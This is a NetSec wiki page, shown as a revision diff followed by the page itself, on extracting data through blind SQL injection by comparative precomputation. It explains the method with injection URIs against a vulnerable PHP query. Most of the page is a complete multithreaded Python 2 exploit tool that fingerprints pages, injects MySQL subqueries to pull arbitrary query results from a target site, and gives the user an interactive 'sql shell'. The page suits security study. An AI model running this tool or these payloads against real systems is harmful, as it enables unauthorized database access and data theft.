Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/Blind/Extraction/Precomputation"

From NetSec
Jump to: navigation, search
(The comparative precomputation attack)
(Response-based result extraction)
Line 1: Line 1:
==Response-based result extraction==
+
Response-based data extraction allows for blind [[SQL injection]] [[exploitation]] to retrieve, in some cases, more than a single [[byte]] from the remote [[SQL]] [[database]].   
Response-based data extraction allows for blind [[SQL injection]] [[exploitation]] to retrieve more than a single byte from the remote database.  The author was able to determine that there are at least two ways to perform this task:
+
 
 +
[[User:Hatter|The author]] was able to determine that there are at least two ways to perform this task:
  
 
* A timing attack, more suited for a LAN ('''L'''ocal '''A'''rea '''N'''etwork)
 
* A timing attack, more suited for a LAN ('''L'''ocal '''A'''rea '''N'''etwork)
 
* A comparative precomputation attack, more suited for the WAN ('''W'''ide '''A'''rea '''N'''etwork, or in this case, the internet)
 
* A comparative precomputation attack, more suited for the WAN ('''W'''ide '''A'''rea '''N'''etwork, or in this case, the internet)
  
 +
This document focuses on the latter, for realistic [[exploitation]] demonstration.
  
===Timing-based===
+
==The comparative precomputation attack==
 
+
 
+
===The comparative precomputation attack===
+
 
{{info|This attack heavily relies on the ''remote dataset'' for successful [[exploitation]] and thus its rate of data retrieval is more variable than other methods.}}
 
{{info|This attack heavily relies on the ''remote dataset'' for successful [[exploitation]] and thus its rate of data retrieval is more variable than other methods.}}
 
  
 
{{code|text=
 
{{code|text=
 
'''Requirements:'''
 
'''Requirements:'''
 +
* <u>Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).</u>
 
* <u>In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data</u>
 
* <u>In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data</u>
* <u>Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context.</u>
 
 
}}  
 
}}  
 +
 +
Precomputation is done for performance and efficiency purposes.  At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket.  The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.
 +
 +
=== The theory ===
 +
The example in this section will rarely (if ever) work in the wild.  It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later.  (skip to advanced explanation)
 +
 +
* Take the following query
 +
{{code|text=<source lang="php">  $query = "select * from articles where id=" . $_GET['id']; </source>}}
 +
* Assume that the above query executed between the following uri's is valid with a unique results set and sequential id's between them:
 +
  /articles.php?id=1
 +
  /articles.php?id=2
 +
  '''...'''
 +
  /articles.php?id=255
 +
 +
 +
* First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.
 +
 +
* To determine the ascii code of the first character of the sql version, an attacker might visit:
 +
  /articles.php?id=ascii(substring(version() from 1 for 1))
 +
 +
The attacker would then take a checksum of the returned html data and lookup the value of the id when this checksum was found during the initial crawl. 
 +
 +
 +
  
  
Line 23: Line 45:
  
  
'''Precomputation is done for performance reasons.  At the very least, a comparative test will be required.  The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.'''
 
  
{{code|text=
 
* Examining the following query:
 
{{code|text=<source lang="php">  $query = "select * from articles where id=$input"; </source>}}
 
* And the following uri:
 
  /articles.php?id=1
 
  
* Testing can be used to see if there are 255 articles by visiting:
 
  /articles.php?id=255 '''Follow the next steps for automation (and sanity's) sake:'''{{code|text=
 
* Choose a language supporting something similar to [http://php.net/manual/en/function.array-flip.php '''array_flip()'''] for programming the automation tool.
 
* Write a loop to download each article
 
* In the loop, populate an array (using integer indexes) with checksum hashes as values
 
* Flip the array}}
 
'''Almost done!'''{{code|text=
 
* Then the following visit can take place:
 
  /articles.php?id&#x3d;ascii(substr(user(),1,1))
 
* Checksum the output
 
* Now accessing the checksums array using the checksum of the output as the key:
 
{{code|text=<source lang="php">  $ascii_code = $checksums[$output_checksum]; </source>}}
 
}}
 
'''<i><u>And the value of a byte has been determined.</u></i>'''
 
{{protip|'''This attack can be extended by:'''{{code|text=
 
* Using arithmetic operators to get sequential id's offset from 0-255 (e.g.  /articles.php?id=(select ascii(substr(user(),1,1))+67)
 
* Using MySQL field operators and a static query that returns id's to bypass the requirement for the id's to be sequential
 
}}
 
}}
 
}}
 
  
 
{{code|text=<source lang="python">#!/usr/bin/python2
 
{{code|text=<source lang="python">#!/usr/bin/python2

Revision as of 08:38, 15 November 2012

Response-based data extraction allows for blind SQL injection exploitation to retrieve, in some cases, more than a single byte from the remote SQL database.

The author was able to determine that there are at least two ways to perform this task:

  • A timing attack, more suited for a LAN (Local Area Network)
  • A comparative precomputation attack, more suited for the WAN (Wide Area Network, or in this case, the internet)

This document focuses on the latter, for realistic exploitation demonstration.

The comparative precomputation attack

c3el4.png This attack heavily relies on the remote dataset for successful exploitation and thus its rate of data retrieval is more variable than other methods.

Requirements:

  • Before comparative precomputation can be initiated, an attacker or penetration tester must be aware of the vulnerable query's context (column and table names).
  • In order for it to be effectively faster than boolean enumeration, the contents of the query result context (column and table) must contain 3 or more instances of unique column and row data

Precomputation is done for performance and efficiency purposes. At the very least, a comparative test will be required - without precomputation, it is expected that ram usage may skyrocket. The more complex a remote site is (random content generation, etc), the more difficult this type of attack becomes to automate.

The theory

The example in this section will rarely (if ever) work in the wild. It is a more basic explaination to prepare the reader's comprehension of the more advanced explanation later. (skip to advanced explanation)

  • Take the following query
  $query = "select * from articles where id=" . $_GET['id']; 
  • Assume that the above query executed between the following uri's is valid with a unique results set and sequential id's between them:
 /articles.php?id=1
 /articles.php?id=2
 ...
 /articles.php?id=255 


  • First, the attacker would crawl all of the pages at id's 1-255, saving them in a hashtable with the associated id used to generate the response.
  • To determine the ascii code of the first character of the sql version, an attacker might visit:
 /articles.php?id=ascii(substring(version() from 1 for 1))

The attacker would then take a checksum of the returned html data and lookup the value of the id when this checksum was found during the initial crawl.






#!/usr/bin/python2
import sys
import urllib2
import time
from binascii import hexlify
import _mysql
import md5
import pickle
import re
import os
import threading
import Queue
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
 
BOLD = '\033[1m'
BLUE = '\033[34m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
RED = '\033[91m'
ENDC = '\033[0m'
 
def request(request_url):
  req = urllib2.Request(request_url)
  req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17')
  r = urllib2.urlopen(req)
  return r.read()
 
def construct_discovery_query(url, column, table, counter):
  discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  discovery =  discovery % (column, column, table, counter)
  return url + urllib2.quote(discovery)
 
def construct_injection_query(url, column, table, query, position):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  injection = injection % (column, column, table, query, position)
  return url + urllib2.quote(injection)
 
def get_length(url, column, table, query, ascii_table, counter):
  injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  length_length = url + urllib2.quote(injection)
  length_length = ascii_table[md5.new(request(length_length)).digest()]
  counter += 1
 
  length = ""
  for i in range(1,length_length+1):
    injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=ascii(substring(length(compress((%s))) from %s for 1)))" 
    injection = injection % (column, column, table, query, i)
    request_url = url + urllib2.quote(injection)
    length += chr(ascii_table[md5.new(request(request_url)).digest()])
    counter += 1
 
  return (int(length), counter)
 
def get_query(prompt):
  while 1:
    query = raw_input(prompt)
    if query != "":
      break
  return query
 
def do_query(url, column, table, query, ascii_table, i, q):
  tmp = construct_injection_query(url, column, table, query, i)
  q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
 
def do_table(url, column, table, i, q):
  tmp = construct_discovery_query(url, column, table, i)
  q.put(md5.new(request(tmp)).digest())
 
def print_percent(percent, start_time):
  elapsed_time = time.time() - start_time
  eta = ((elapsed_time) / percent) * 100 - elapsed_time
  sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s" % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  sys.stdout.flush()
 
def do_thread(target, args, counter, length, type_query):
  if type_query == 0:
    ascii_table = {}
  else:
    query_result = ""
 
  if type_query == 0:
    i = 0
  else:
    i = 1
 
 
  sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  sys.stdout.flush()
  start_time = time.time()
 
  while i < length:
    threads = {}
    queues  = []
 
    for j in range(0,11):
      if i < length:
        queues.append(Queue.Queue())
        threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
        i += 1
        counter += 1
        print_percent(100 * float(i) / float(length), start_time)
 
    for thread in threads:
      threads[thread].start()
 
    for j, thread in enumerate(sorted(threads.iterkeys())):
      if type_query == 0:
        ascii_table[queues[j].get()] = thread
      else:
        query_result += queues[j].get()
      threads[thread].join()
 
  sys.stdout.write('\n')
  sys.stdout.flush()
 
  if type_query == 0:
    return ascii_table
  else:
    return (counter, query_result)
 
def main(url, column, table):
  session_name = re.split("(https?://)?(.*)/", url)[2]
 
  print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  try:
    try:
      os.stat("data")
    except:
      os.mkdir("data")
    ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
    print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  except:
    print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
    current = time.time()
    ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
    pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
    print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
 
  print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
 
  while 1:
    query = get_query("%ssql shell>%s " % (BOLD, ENDC))
    if query == "exit":
      break
 
    query_result = ""
    counter = 0
    current = time.time()
    (length, counter) = get_length(url, column, table, query, ascii_table, counter)
 
    (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
 
    query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
    mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
    mysql_connection.query(query)
    result = mysql_connection.use_result()
    data = result.fetch_row()[0][0]
    mysql_connection.close()
 
    print data
    print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s" % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
 
  print "%s[*]%s Good bye" % (GREEN, ENDC)
 
if __name__=="__main__":
  if len(sys.argv) != 4:
    print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
    exit()
 
  print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  main(sys.argv[1], sys.argv[2], sys.argv[3])